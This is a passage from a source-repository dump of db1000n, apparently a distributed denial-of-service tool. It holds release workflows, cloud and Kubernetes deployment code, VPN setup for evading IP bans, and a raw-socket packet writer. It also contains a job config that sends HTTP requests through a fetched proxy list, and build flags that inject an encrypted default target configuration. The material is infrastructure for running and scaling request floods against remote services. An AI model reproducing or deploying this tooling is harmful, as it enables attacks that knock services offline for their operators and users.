manual](https://docs.google.com/document/d/e/2PACX-1vTeCirL7ANTcX9vKXniKTjKkxGEE9Ftd1xBc0bHKPoSrd2aj5fNeresltDUEp6ZYNgM3EZF5csNj_R4/pub) 10 | 11 | This playbook creates one Linux and one Windows EC2 instances from customized AMIs so whole setup fits into Free Tier limits. This means it can run for free 1 year from AWS account creation. 12 | 13 | The AMI has OpenSSH server installed. The public key is copied to the server if it's created using Ansible playbook provided. Otherwise it would have to be done manually after logging in to the server. 14 | 15 | The Administrator password is reset during startup and can be retrieved in a standard AWS way. 16 | -------------------------------------------------------------------------------- /.github/workflows/goreleaser-action.yaml: -------------------------------------------------------------------------------- 1 | name: goreleaser 2 | 3 | on: 4 | push: 5 | tags: ["**"] 6 | 7 | jobs: 8 | goreleaser: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - name: Checkout 12 | uses: actions/checkout@v2 13 | with: 14 | fetch-depth: 0 15 | - name: Fetch all tags 16 | run: git fetch --force --tags 17 | - name: Set up Go 18 | uses: actions/setup-go@v2 19 | with: 20 | go-version: 1.18 21 | - name: Run GoReleaser 22 | uses: goreleaser/goreleaser-action@v2 23 | with: 24 | # either 'goreleaser' (default) or 'goreleaser-pro' 25 | distribution: goreleaser 26 | version: latest 27 | args: release --rm-dist 28 | env: 29 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 30 | PROTECTED_KEYS: ${{ secrets.PROTECTED_KEYS }} 31 | DEFAULT_CONFIG_VALUE: ${{ secrets.DEFAULT_CONFIG }} 32 | DEFAULT_CONFIG_PATH: ${{ secrets.DEFAULT_CONFIG_PATH }} 33 | -------------------------------------------------------------------------------- /.github/pull_request_template.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | Please include a summary of the change and which issue is fixed. Please also include relevant motivation and context. List any dependencies that are required for this change. 4 | 5 | Fixes # (issue) 6 | 7 | ## Type of change 8 | 9 | Please delete options that are not relevant. 10 | 11 | - [ ] Bug fix (non-breaking change which fixes an issue) 12 | - [ ] New feature (non-breaking change which adds functionality) 13 | - [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected) 14 | - [ ] Documentation update 15 | 16 | ## How Has This Been Tested? 17 | 18 | Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration 19 | 20 | - [ ] Test A 21 | - [ ] Test B 22 | 23 | ## Test Configuration 24 | 25 | - Release version: 26 | - Platform: 27 | 28 | ## Logs 29 | 30 | ```text 31 | logs 32 | ``` 33 | 34 | ## Screenshots 35 | 36 | - [ ] No screenshot 37 | -------------------------------------------------------------------------------- /.github/workflows/ko-release.yaml: -------------------------------------------------------------------------------- 1 | # This workflow uses actions that are not certified by GitHub. 2 | # They are provided by a third-party and are governed by 3 | # separate terms of service, privacy policy, and support 4 | # documentation. 5 | 6 | name: Release with ko 7 | 8 | on: 9 | push: 10 | tags: ["**"] 11 | 12 | env: 13 | DOCKER_REPO: ghcr.io/${{ github.repository_owner }}/db1000n 14 | 15 | jobs: 16 | push_to_registry: 17 | name: Publish docker image with ko 18 | runs-on: ubuntu-latest 19 | steps: 20 | - uses: actions/setup-go@v2 21 | with: 22 | go-version: 1.18 23 | - uses: actions/checkout@v2 24 | - uses: imjasonh/setup-ko@v0.6 25 | - run: KO_DOCKER_REPO=${DOCKER_REPO,,} ko publish --bare --tags ${{ github.ref_name }},latest --platform all . 26 | env: 27 | VERSION: ${{ github.ref_name }} 28 | PROTECTED_KEYS: ${{ secrets.PROTECTED_KEYS }} 29 | DEFAULT_CONFIG_VALUE: ${{ secrets.DEFAULT_CONFIG }} 30 | DEFAULT_CONFIG_PATH: ${{ secrets.DEFAULT_CONFIG_PATH }} 31 | -------------------------------------------------------------------------------- /.github/workflows/ko-build.yaml: -------------------------------------------------------------------------------- 1 | # This workflow uses actions that are not certified by GitHub. 2 | # They are provided by a third-party and are governed by 3 | # separate terms of service, privacy policy, and support 4 | # documentation. 5 | 6 | name: Build with ko 7 | 8 | on: 9 | push: 10 | branches: ["main"] 11 | tags: ["**"] 12 | 13 | env: 14 | DOCKER_REPO: ghcr.io/${{ github.repository_owner }}/db1000n-beta 15 | 16 | jobs: 17 | push_to_registry: 18 | name: Publish docker image with ko 19 | runs-on: ubuntu-latest 20 | steps: 21 | - uses: actions/setup-go@v2 22 | with: 23 | go-version: 1.18 24 | - uses: actions/checkout@v2 25 | - uses: imjasonh/setup-ko@v0.6 26 | - run: KO_DOCKER_REPO=${DOCKER_REPO,,} ko publish --bare --tags ${{ github.ref_name }},latest --platform all . 27 | env: 28 | VERSION: ${{ github.ref_name }}-beta 29 | PROTECTED_KEYS: ${{ secrets.PROTECTED_KEYS }} 30 | DEFAULT_CONFIG_VALUE: ${{ secrets.DEFAULT_CONFIG }} 31 | DEFAULT_CONFIG_PATH: ${{ secrets.DEFAULT_CONFIG_PATH }} 32 | -------------------------------------------------------------------------------- /testconfig.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: sequence 3 | args: 4 | jobs: 5 | - type: set-value 6 | name: proxylist 7 | args: 8 | value: '{{ join (get_url "https://raw.githubusercontent.com/Arriven/db1000n/main/proxylist.json" | from_string_array) "," }}' 9 | - type: log 10 | args: 11 | text: '{{ .Value (ctx_key "data.proxylist") }}' 12 | - type: http 13 | args: 14 | count: 1 15 | request: 16 | method: GET 17 | path: 'https://localhost:8080/search?searchid={{ index (.Value (ctx_key "config")) "args" "jobs" 0 "type" }}&l10n=ru&reqenc=&text={{ random_uuid }}' 18 | client: 19 | # timeout: 1s 20 | proxy_urls: '{{ .Value (ctx_key "data.proxylist") }}' 21 | - type: http 22 | args: 23 | request: 24 | method: GET 25 | path: "https://localhost:8090/search?searchid={{ random_uuid }}&l10n=ru&reqenc=&text={{ random_uuid }}" 26 | client: 27 | proxy_urls: '{{ .Value (ctx_key "data.proxylist") }}' 28 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-nodes/data.tf: -------------------------------------------------------------------------------- 1 | data "aws_iam_policy_document" "eks_worker_node_assume_role_policy" { 2 | statement { 3 | sid = "EKSWorkerAssumeRole" 4 | 5 | actions = ["sts:AssumeRole"] 6 | 7 | principals { 8 | type = "Service" 9 | identifiers = ["ec2.amazonaws.com"] 10 | } 11 | } 12 | } 13 | 14 | data "aws_iam_policy_document" "assume_role_policy" { 15 | statement { 16 | actions = ["sts:AssumeRole"] 17 | resources = ["*"] 18 | } 19 | } 20 | 21 | data "aws_ami" "amazon_eks_nodes" { 22 | most_recent = true 23 | owners = ["amazon"] 24 | 25 | filter { 26 | name = "name" 27 | values = ["amazon-eks-node-${var.cluster_version}-*"] 28 | } 29 | 30 | filter { 31 | name = "owner-alias" 32 | values = [ 33 | "amazon", 34 | ] 35 | } 36 | } 37 | 38 | data "template_file" "user_data" { 39 | template = file("${path.root}/scripts/node-user-data.sh") 40 | 41 | vars = { 42 | CLUSTER_NAME = var.cluster_name 43 | CLUSTER_ENDPOINT = var.cluster_endpoint 44 | CLUSTER_CA_DATA = var.cluster_ca_data 45 | } 46 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Bohdan Ivashko 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /golangci-lint.nix: -------------------------------------------------------------------------------- 1 | with import {}; 2 | 3 | buildGo118Module rec { 4 | pname = "golangci-lint"; 5 | version = "1.45.2"; 6 | 7 | src = fetchFromGitHub { 8 | owner = "golangci"; 9 | repo = "golangci-lint"; 10 | rev = "v${version}"; 11 | sha256 = "sha256-Mr45nJbpyzxo0ZPwx22JW2WrjyjI9FPpl+gZ7NIc6WQ="; 12 | }; 13 | 14 | vendorSha256 = "sha256-pcbKg1ePN8pObS9EzP3QYjtaty27L9sroKUs/qEPtJo="; 15 | 16 | doCheck = false; 17 | 18 | subPackages = [ "cmd/golangci-lint" ]; 19 | 20 | nativeBuildInputs = [ installShellFiles ]; 21 | 22 | ldflags = [ 23 | "-s" "-w" "-X main.version=${version}" "-X main.commit=v${version}" "-X main.date=19700101-00:00:00" 24 | ]; 25 | 26 | postInstall = '' 27 | for shell in bash zsh fish; do 28 | HOME=$TMPDIR $out/bin/golangci-lint completion $shell > golangci-lint.$shell 29 | installShellCompletion golangci-lint.$shell 30 | done 31 | ''; 32 | 33 | meta = with lib; { 34 | description = "Fast linters Runner for Go"; 35 | homepage = "https://golangci-lint.run/"; 36 | license = licenses.gpl3Plus; 37 | maintainers = with maintainers; [ anpryl manveru mic92 ]; 38 | }; 39 | } -------------------------------------------------------------------------------- /src/utils/ota/restart_windows.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "os" 9 | "os/exec" 10 | "strings" 11 | "syscall" 12 | 13 | "go.uber.org/zap" 14 | ) 15 | 16 | func restart(logger *zap.Logger, extraArgs ...string) error { 17 | execPath, err := os.Executable() 18 | if err != nil { 19 | return fmt.Errorf("failed to locate the executable file: %w", err) 20 | } 21 | 22 | // A specific way the `cmd.exe` processes the `start` command: it takes the 23 | // first quoted substring as a process name! (https://superuser.com/a/1656458) 24 | cmdLine := fmt.Sprintf(`/C start "process" "%s"`, execPath) 25 | args := []string{} 26 | 27 | if len(extraArgs) != 0 { 28 | args = appendArgIfNotPresent(os.Args[1:], extraArgs) 29 | } else { 30 | args = os.Args[1:] 31 | } 32 | 33 | if len(args) > 0 { 34 | cmdLine += " " + strings.Join(args, " ") 35 | } 36 | 37 | cmd := exec.Command("cmd.exe") 38 | cmd.SysProcAttr = &syscall.SysProcAttr{CmdLine: cmdLine} 39 | 40 | if err := cmd.Start(); err != nil { 41 | return fmt.Errorf("failed to start the command: %w", err) 42 | } 43 | 44 | os.Exit(0) 45 | 46 | return nil 47 | } 48 | -------------------------------------------------------------------------------- /ansible/linux/README.md: -------------------------------------------------------------------------------- 1 | # Ansible playbook to setup plain VM 2 | 3 | Script will be useful if you have some plain VM and want to quickly setup it. Playbook tested on Ubuntu 20.04 4 | 5 | ## Requirements 6 | 7 | - [Ansible](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html) 8 | - Any VM with SSH access 9 | - OPTIONAL: Subscription on [expressvpn.com](https://www.expressvpn.com) (get the activation code) 10 | 11 | ## Init 12 | 13 | ```sh 14 | cp inventory.cfg.example inventory.cfg 15 | ``` 16 | 17 | Fill inventory.cfg with values. 18 | Example with [ExpressVPN](https://www.expressvpn.com): 19 | 20 | ```sh 21 | [target] 22 | 11.22.33.44 ansible_connection=ssh ansible_ssh_user=user 23 | 24 | [target:vars] 25 | ansible_python_interpreter=/usr/bin/python3 26 | setup_vpn=True 27 | expressvpn_activation_code=JFJKAMV7171 28 | ``` 29 | 30 | Example without VPN(not recommended): 31 | 32 | ```sh 33 | [target] 34 | 11.22.33.44 ansible_connection=ssh ansible_ssh_user=user 35 | 36 | [target:vars] 37 | ansible_python_interpreter=/usr/bin/python3 38 | setup_vpn=False 39 | ``` 40 | 41 | ## Deploy 42 | 43 | ```sh 44 | ansible-playbook -i inventory.cfg setup.yaml 45 | ``` 46 | -------------------------------------------------------------------------------- /src/utils/ota/restart_darwin.go: -------------------------------------------------------------------------------- 1 | //go:build darwin 2 | // +build darwin 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "os" 9 | "syscall" 10 | 11 | "go.uber.org/zap" 12 | ) 13 | 14 | func restart(logger *zap.Logger, extraArgs ...string) error { 15 | executable, err := os.Executable() 16 | if err != nil { 17 | return fmt.Errorf("failed to resolve the path to the current executable: %w", err) 18 | } 19 | 20 | workingDirectory, err := os.Getwd() 21 | if err != nil { 22 | return fmt.Errorf("failed to resolve the current working directory: %w", err) 23 | } 24 | 25 | execSpec := &syscall.ProcAttr{ 26 | Dir: workingDirectory, 27 | Env: os.Environ(), 28 | Files: []uintptr{ 29 | os.Stdin.Fd(), 30 | os.Stdout.Fd(), 31 | os.Stderr.Fd(), 32 | }, 33 | } 34 | 35 | var args []string 36 | 37 | if len(extraArgs) != 0 { 38 | args = appendArgIfNotPresent(os.Args[1:], extraArgs) 39 | } else { 40 | args = os.Args[1:] 41 | } 42 | 43 | fork, err := syscall.ForkExec(executable, args, execSpec) 44 | if err != nil { 45 | return fmt.Errorf("failed to spawn a new process: %w", err) 46 | } 47 | 48 | logger.Info("new process has been started successfully", 49 | zap.Int("old_pid", os.Getpid()), zap.Int("new_pid", fork)) 50 | 51 | os.Exit(0) 52 | 53 | return nil 54 | } 55 | -------------------------------------------------------------------------------- /src/utils/ota/restart_linux.go: -------------------------------------------------------------------------------- 1 | //go:build linux 2 | // +build linux 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "os" 9 | "syscall" 10 | 11 | "go.uber.org/zap" 12 | ) 13 | 14 | func restart(logger *zap.Logger, extraArgs ...string) error { 15 | executable, err := os.Executable() 16 | if err != nil { 17 | return fmt.Errorf("failed to resolve the path to the current executable: %w", err) 18 | } 19 | 20 | workingDirectory, err := os.Getwd() 21 | if err != nil { 22 | return fmt.Errorf("failed to resolve the current working directory: %w", err) 23 | } 24 | 25 | execSpec := &syscall.ProcAttr{ 26 | Dir: workingDirectory, 27 | Env: os.Environ(), 28 | Files: []uintptr{ 29 | os.Stdin.Fd(), 30 | os.Stdout.Fd(), 31 | os.Stderr.Fd(), 32 | }, 33 | } 34 | 35 | var args []string 36 | 37 | if len(extraArgs) != 0 { 38 | args = appendArgIfNotPresent(os.Args[1:], extraArgs) 39 | } else { 40 | args = os.Args[1:] 41 | } 42 | 43 | fork, err := syscall.ForkExec(executable, args, execSpec) 44 | if err != nil { 45 | return fmt.Errorf("failed to spawn a new process: %w", err) 46 | } 47 | 48 | logger.Info("new process has been started successfully", 49 | zap.Int("old_pid", os.Getpid()), zap.Int("new_pid", fork)) 50 | 51 | os.Exit(0) 52 | 53 | return nil 54 | } 55 | -------------------------------------------------------------------------------- /terraform/aws_eks/variables.tf: -------------------------------------------------------------------------------- 1 | # common 2 | variable "region" { 3 | description = "AWS region" 4 | default = "us-east-1" 5 | } 6 | 7 | variable "profile" { 8 | description = "AWS profile" 9 | default = "default" 10 | } 11 | 12 | variable "project" { 13 | description = "A list of projects to deploy" 14 | default = "db1000n" 15 | } 16 | 17 | # ssh key 18 | variable "key_name" { 19 | description = "SSH key name" 20 | default = "db1000n" 21 | } 22 | 23 | variable "public_key" { 24 | description = "SSH public key" 25 | } 26 | 27 | # eks 28 | variable "eks_node_instance_type" { 29 | description = "EC2 instance type for EKS nodes" 30 | default = "t3.medium" 31 | } 32 | 33 | variable "eks_node_desired_capacity" { 34 | description = "The number of Amazon EC2 instances that should be running in the auto scale group" 35 | default = "3" 36 | } 37 | 38 | variable "eks_node_max_size" { 39 | description = "The maximum size of the auto scale group" 40 | default = "4" 41 | } 42 | 43 | variable "eks_node_min_size" { 44 | description = "The minimum size of the auto scale group" 45 | default = "2" 46 | } 47 | 48 | variable "tags" { 49 | description = "A map of tags to add to VPC" 50 | type = map(string) 51 | default = {} 52 | } -------------------------------------------------------------------------------- /docs/advanced-docs/docker-vpn.md: -------------------------------------------------------------------------------- 1 | # Docker VPN 2 | 3 | ## Setting up VPN for Docker users 4 | 5 | In case of using a dedicated VPS that has banned public IP, a container with OpenVPN client can be deployed inside the same network as db1000n is in. 6 | One of the easy ways to set it up is through the docker-compose. 7 | 8 | There are few `docker-compose` examples, see `examples/docker`. Documentation you can find below: 9 | 10 | ### Static Docker Compose 11 | 12 | `openvpn/auth.txt`: 13 | 14 | ```text 15 | 16 | 17 | ``` 18 | 19 | Also place your `*.ovpn` file into `openvpn/` directory. You can set multiple configuration files and one of them will be used. 20 | 21 | ### Old Docker Compose 22 | 23 | `openvpn/provider01.txt`: 24 | 25 | ```text 26 | 27 | 28 | ``` 29 | 30 | `openvpn/provider02.txt`: 31 | 32 | ```text 33 | 34 | 35 | ``` 36 | 37 | Also place your `provider01.endpoint01.conf`, `provider01.endpoint02.conf` and `provider02.endpoint01.conf` files into `openvpn/` directory. 38 | 39 | ## Start 40 | 41 | ```sh 42 | docker-compose -f examples/docker/your_docker_file.yml up -d 43 | ``` 44 | 45 | ## Stop 46 | 47 | ```sh 48 | docker-compose -f examples/docker/your_docker_file.yml down 49 | ``` 50 | -------------------------------------------------------------------------------- /src/utils/backoff.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "context" 5 | "time" 6 | ) 7 | 8 | func Sleep(ctx context.Context, t time.Duration) bool { 9 | select { 10 | case <-time.After(t): 11 | return true 12 | case <-ctx.Done(): 13 | return false 14 | } 15 | } 16 | 17 | type BackoffConfig struct { 18 | Multiplier int 19 | Limit int 20 | Timeout time.Duration 21 | } 22 | 23 | func DefaultBackoffConfig() BackoffConfig { 24 | const ( 25 | defaultMultiplier = 10 26 | defaultLimit = 6 27 | ) 28 | 29 | return BackoffConfig{Multiplier: defaultMultiplier, Limit: defaultLimit, Timeout: time.Microsecond} 30 | } 31 | 32 | type BackoffController struct { 33 | BackoffConfig 34 | count int 35 | } 36 | 37 | func (c BackoffController) GetTimeout() time.Duration { 38 | result := c.Timeout 39 | for i := 0; i < c.count; i++ { 40 | result *= time.Duration(c.Multiplier) 41 | } 42 | 43 | return result 44 | } 45 | 46 | func (c *BackoffController) Increment() *BackoffController { 47 | if c.count < c.Limit { 48 | c.count++ 49 | } 50 | 51 | // return pointer to itself for usability 52 | return c 53 | } 54 | 55 | func (c *BackoffController) Reset() { 56 | c.count = 0 57 | } 58 | 59 | type Counter struct { 60 | Count int 61 | 62 | iter int 63 | } 64 | 65 | func (c *Counter) Next() bool { 66 | if c.Count <= 0 { 67 | return true 68 | } 69 | 70 | c.iter++ 71 | 72 | return c.iter <= c.Count 73 | } 74 | -------------------------------------------------------------------------------- /src/utils/metrics/serve.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "net/http" 7 | "time" 8 | 9 | "github.com/prometheus/client_golang/prometheus" 10 | "github.com/prometheus/client_golang/prometheus/promhttp" 11 | "go.uber.org/zap" 12 | ) 13 | 14 | func serveMetrics(ctx context.Context, logger *zap.Logger, listen string) { 15 | // We don't expect that rendering metrics should take a lot of time and needs long timeout 16 | const timeout = 30 * time.Second 17 | 18 | mux := http.NewServeMux() 19 | mux.Handle("/metrics", promhttp.HandlerFor( 20 | prometheus.DefaultGatherer, 21 | promhttp.HandlerOpts{ 22 | // Opt into OpenMetrics to support exemplars. 23 | EnableOpenMetrics: true, 24 | Timeout: timeout, 25 | }, 26 | )) 27 | 28 | server := &http.Server{ 29 | Addr: listen, 30 | Handler: mux, 31 | ReadTimeout: time.Second, 32 | ReadHeaderTimeout: time.Second, 33 | } 34 | go func(ctx context.Context, server *http.Server) { 35 | <-ctx.Done() 36 | 37 | if err := server.Shutdown(ctx); err != nil && !errors.Is(err, 38 | http.ErrServerClosed) && !errors.Is(err, context.Canceled) { 39 | logger.Warn("failed to shut down prometheus server", zap.Error(err)) 40 | } 41 | }(ctx, server) 42 | 43 | err := server.ListenAndServe() 44 | if err != nil && !errors.Is(err, http.ErrServerClosed) { 45 | logger.Warn("failed to start prometheus server", zap.Error(err)) 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /src/core/packetgen/raw_conn_unix.go: -------------------------------------------------------------------------------- 1 | //go:build !windows 2 | // +build !windows 3 | 4 | package packetgen 5 | 6 | import ( 7 | "fmt" 8 | "syscall" 9 | 10 | "github.com/google/gopacket" 11 | ) 12 | 13 | type rawConn struct { 14 | fd int 15 | buf gopacket.SerializeBuffer 16 | } 17 | 18 | // openRawConn opens a raw ip network connection based on the provided config 19 | // use ipv6 as it also supports ipv4 20 | func openRawConn() (*rawConn, error) { 21 | fd, err := syscall.Socket(syscall.AF_INET, syscall.SOCK_RAW, syscall.IPPROTO_RAW) 22 | if err != nil { 23 | return nil, err 24 | } 25 | 26 | err = syscall.SetsockoptInt(fd, syscall.IPPROTO_IP, syscall.IP_HDRINCL, 1) 27 | if err != nil { 28 | return nil, err 29 | } 30 | 31 | return &rawConn{ 32 | fd: fd, 33 | buf: gopacket.NewSerializeBuffer(), 34 | }, nil 35 | } 36 | 37 | func (conn *rawConn) Write(packet Packet) (n int, err error) { 38 | if err := packet.Serialize(conn.buf); err != nil { 39 | return 0, fmt.Errorf("error serializing packet: %w", err) 40 | } 41 | 42 | addr := &syscall.SockaddrInet4{} 43 | 44 | // ipv6 is not supported for now 45 | copy(addr.Addr[:], packet.IP().To4()) 46 | 47 | return 0, syscall.Sendto(conn.fd, conn.buf.Bytes(), 0, addr) 48 | } 49 | 50 | func (conn *rawConn) Close() error { 51 | return syscall.Close(conn.fd) 52 | } 53 | 54 | func (conn *rawConn) Target() string { return "raw://" } 55 | 56 | func (conn *rawConn) Read(_ []byte) (int, error) { return 0, nil } 57 | -------------------------------------------------------------------------------- /kubernetes/manifests/README.md: -------------------------------------------------------------------------------- 1 | # Kubernetes manifests to install 2 | 3 | ## If you use Helm, see our [Helm Chart](/db1000n/advanced-docs/kubernetes/helm-charts/) 4 | 5 | There are two ways to deploy it with plain manifests: 6 | 7 | - using Deployment 8 | - using DaemonSet 9 | 10 | ## Deployment 11 | 12 | Install: 13 | 14 | ```bash 15 | cd kubernetes/manifests/ 16 | kubectl apply -f deployment.yaml 17 | kubectl get po -n db1000n 18 | ``` 19 | 20 | Scale: 21 | 22 | ```bash 23 | kubectl scale deployment/db1000n --replicas=10 -n db1000n 24 | ``` 25 | 26 | Destroy: 27 | 28 | ```bash 29 | kubectl delete deploy db1000n -n db1000n 30 | ``` 31 | 32 | ## DaemonSet 33 | 34 | Get and label nodes where you need to run `db1000n`. 35 | There should be nodes at least with 2CPU and 2GB of RAM, CPU resources in priority for `db1000n`: 36 | 37 | ```bash 38 | kubectl get nodes 39 | ``` 40 | 41 | Select nodes where you want to run `db1000n` from the output and label them: 42 | 43 | ```bash 44 | kubectl label nodes db1000n=true 45 | ``` 46 | 47 | Install the DaemonSet: 48 | 49 | ```bash 50 | kubectl apply -f daemonset.yaml 51 | ``` 52 | 53 | Destroy: 54 | 55 | ```bash 56 | kubectl delete daemonset db1000n -n db1000n 57 | ``` 58 | 59 | ???+ info "How it works?" 60 | 61 | DaemonSet will create one `db1000n` pod on each node that labeled as `db1000n=true`. 62 | It coule be useful in large cluster types that can be autoscaled horizontally, for example, GKE standard k8s cluster from the free tier purposes. 63 | -------------------------------------------------------------------------------- /.goreleaser.yaml: -------------------------------------------------------------------------------- 1 | project_name: db1000n 2 | builds: 3 | - id: db1000n 4 | env: 5 | - CGO_ENABLED=0 6 | dir: . 7 | main: . 8 | goos: 9 | - linux 10 | - windows 11 | - darwin 12 | - freebsd 13 | - netbsd 14 | - openbsd 15 | - dragonfly 16 | - aix 17 | - illumos 18 | - solaris 19 | goarch: 20 | - amd64 21 | - arm64 22 | - arm 23 | - "386" 24 | - "mips" 25 | - "mips64" 26 | - "mips64le" 27 | - "mipsle" 28 | - "riscv64" 29 | - "s390x" 30 | gomips: 31 | - hardfloat 32 | - softfloat 33 | flags: 34 | - -tags=encrypted 35 | goarm: 36 | - "5" 37 | - "6" 38 | - "7" 39 | ldflags: 40 | - -s -w 41 | - -extldflags "-static" 42 | - -X github.com/Arriven/db1000n/src/utils/ota.Version={{ .Version }} 43 | - -X github.com/Arriven/db1000n/src/utils.ProtectedKeys={{ .Env.PROTECTED_KEYS }} 44 | - -X github.com/Arriven/db1000n/src/job/config.DefaultConfig={{ .Env.DEFAULT_CONFIG_VALUE }} 45 | - -X github.com/Arriven/db1000n/src/job.DefaultConfigPathCSV={{ .Env.DEFAULT_CONFIG_PATH }} 46 | archives: 47 | - id: default 48 | name_template: '{{ .ProjectName }}_{{ .Os }}_{{ .Arch }}{{ with .Arm }}v{{ . }}{{ end }}{{ with .Mips }}_{{ . }}{{ end }}{{ if not (eq .Amd64 "v1") }}{{ .Amd64 }}{{ end }}' 49 | builds: 50 | - db1000n 51 | format: tar.gz 52 | format_overrides: 53 | - goos: windows 54 | format: zip 55 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/data.tf: -------------------------------------------------------------------------------- 1 | data "tls_certificate" "cert" { 2 | url = aws_eks_cluster.eks_cluster.identity[0].oidc[0].issuer 3 | } 4 | 5 | data "aws_iam_policy_document" "eks_cluster_assume_role_policy" { 6 | statement { 7 | actions = ["sts:AssumeRole"] 8 | 9 | principals { 10 | type = "Service" 11 | identifiers = ["eks.amazonaws.com"] 12 | } 13 | } 14 | } 15 | 16 | # Cluster autoscaler 17 | data "aws_iam_policy_document" "assume_role_policy_web_identity" { 18 | statement { 19 | actions = ["sts:AssumeRoleWithWebIdentity"] 20 | 21 | principals { 22 | type = "Federated" 23 | identifiers = ["${aws_iam_openid_connect_provider.oidc_provider.id}"] 24 | } 25 | 26 | condition { 27 | test = "StringEquals" 28 | variable = "${replace(aws_iam_openid_connect_provider.oidc_provider.url, "https://", "")}:sub" 29 | values = ["system:serviceaccount:kube-system:aws-node", "system:serviceaccount:kube-system:cluster-autoscaler"] 30 | } 31 | } 32 | } 33 | 34 | data "aws_iam_policy_document" "eks_cluster_autoscaler_policy" { 35 | statement { 36 | resources = ["*"] 37 | actions = [ 38 | "autoscaling:DescribeAutoScalingGroups", 39 | "autoscaling:DescribeAutoScalingInstances", 40 | "autoscaling:DescribeLaunchConfigurations", 41 | "autoscaling:DescribeTags", 42 | "autoscaling:SetDesiredCapacity", 43 | "autoscaling:TerminateInstanceInAutoScalingGroup", 44 | "ec2:DescribeLaunchTemplateVersions" 45 | ] 46 | } 47 | } -------------------------------------------------------------------------------- /src/utils/ota/shared_test.go: -------------------------------------------------------------------------------- 1 | package ota 2 | 3 | import ( 4 | "strings" 5 | "testing" 6 | ) 7 | 8 | func TestMergeExtraArgs(t *testing.T) { 9 | t.Parallel() 10 | 11 | type testCase struct { 12 | Name string 13 | OSArgs []string 14 | ExtraArgs []string 15 | ExpectedArgs []string 16 | } 17 | 18 | testCases := []testCase{ 19 | { 20 | Name: "no extra args", 21 | OSArgs: []string{"--pprof=:8080"}, 22 | ExpectedArgs: []string{"--pprof=:8080"}, 23 | }, 24 | { 25 | Name: "unique extra args", 26 | OSArgs: []string{"--pprof=:8080"}, 27 | ExtraArgs: []string{"--enable-self-update", "--make-yourself-comfortable"}, 28 | ExpectedArgs: []string{"--pprof=:8080", "--enable-self-update", "--make-yourself-comfortable"}, 29 | }, 30 | { 31 | Name: "overlapping extra args", 32 | OSArgs: []string{"--pprof=:8080"}, 33 | ExpectedArgs: []string{"--pprof=:8080", "--enable-self-update", "--make-yourself-comfortable"}, 34 | ExtraArgs: []string{"--pprof=:8080", "--enable-self-update", "--make-yourself-comfortable"}, 35 | }, 36 | } 37 | 38 | for i := range testCases { 39 | tc := testCases[i] 40 | 41 | t.Run(tc.Name, func(tt *testing.T) { 42 | tt.Parallel() 43 | 44 | mergedArgs := appendArgIfNotPresent(tc.OSArgs, tc.ExtraArgs) 45 | 46 | gotRawArgs := strings.Join(mergedArgs, " ") 47 | expectedRawArgs := strings.Join(tc.ExpectedArgs, " ") 48 | 49 | if gotRawArgs != expectedRawArgs { 50 | t.Errorf("Unexpected merge results:\nexp: %s\ngot: %s", 51 | expectedRawArgs, gotRawArgs) 52 | } 53 | }) 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /src/utils/metrics/accumulator.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | // Accumulator for statistical metrics for use in a single job. Requires Flush()-ing to Reporter. 4 | // Not concurrency-safe. 5 | type Accumulator struct { 6 | jobID string 7 | stats [NumStats]map[string]uint64 // Array of metrics by Stat. Each metric is a map of uint64 values by target. 8 | metrics *Metrics 9 | } 10 | 11 | type dimensions struct { 12 | jobID string 13 | target string 14 | } 15 | 16 | // Add n to the Accumulator Stat value. Returns self for chaining. 17 | func (a *Accumulator) Add(target string, s Stat, n uint64) *Accumulator { 18 | a.stats[s][target] += n 19 | 20 | return a 21 | } 22 | 23 | // Inc increases Accumulator Stat value by 1. Returns self for chaining. 24 | func (a *Accumulator) Inc(target string, s Stat) *Accumulator { return a.Add(target, s, 1) } 25 | 26 | // Flush Accumulator contents to the Reporter. 27 | func (a *Accumulator) Flush() { 28 | for stat := RequestsAttemptedStat; stat < NumStats; stat++ { 29 | for target, value := range a.stats[stat] { 30 | a.metrics[stat].Store(dimensions{jobID: a.jobID, target: target}, value) 31 | } 32 | } 33 | } 34 | 35 | // Clone a new, blank metrics Accumulator with the same Reporter as the original. 36 | func (a *Accumulator) Clone(jobID string) *Accumulator { 37 | if a == nil { 38 | return nil 39 | } 40 | 41 | return newAccumulator(jobID, 